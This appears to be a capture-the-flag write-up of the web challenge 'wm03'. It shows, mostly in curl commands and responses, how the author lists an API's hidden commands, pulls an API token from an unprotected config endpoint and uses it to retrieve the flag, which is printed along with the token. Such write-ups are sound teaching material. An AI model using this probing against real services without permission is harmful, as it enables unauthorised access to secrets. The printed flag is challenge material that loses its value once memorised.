+++
title = "wm03"
+++

Description:

>Visit the site at https://ggcs-wm03.allyourbases.co and investigate the API that serves the page to find a way to get the flag.

To the developer console and the network tab, we find that it's making requests shaped like this:
```bash
curl -X POST "https://oo5apsmnc8.execute-api.eu-west-1.amazonaws.com/stag/wm03" -d '{"getUser": 1}'
```

Let's try not providing anything in that JSON object:
```bash
curl -X POST "https://oo5apsmnc8.execute-api.eu-west-1.amazonaws.com/stag/wm03" -d '{}'
```
```json
{"statusCode": 200, "body": {"commands": ["getUser", "setUser", "getFlag", "config"]}}
```

Hello.
```bash
curl -X POST "https://oo5apsmnc8.execute-api.eu-west-1.amazonaws.com/stag/wm03" -d '{"getFlag": {}}'
```
```json
{"statusCode": 200, "body": {"error": "missing api_token."}}
```

:(

What about that `config` endpoint?
```bash
curl -X POST "https://oo5apsmnc8.execute-api.eu-west-1.amazonaws.com/stag/wm03" -d '{"config": {}}'
```
```json
{"statusCode": 200, "body": {"api_token": "supersecret31337apitoken"}}
```

Oops.
```bash
curl -X POST "https://oo5apsmnc8.execute-api.eu-west-1.amazonaws.com/stag/wm03" -d '{"getFlag": {}, "api_token": "supersecret31337apitoken"}'
```
```json
{"statusCode": 200, "body": {"flag": "LAx_AUThEntiCaTION-:("}}
```

(technically, this isn't lax authentication, it's [sensitive data exposure](https://owasp.org/www-project-top-ten/OWASP_Top_Ten_2017/Top_10-2017_A3-Sensitive_Data_Exposure))
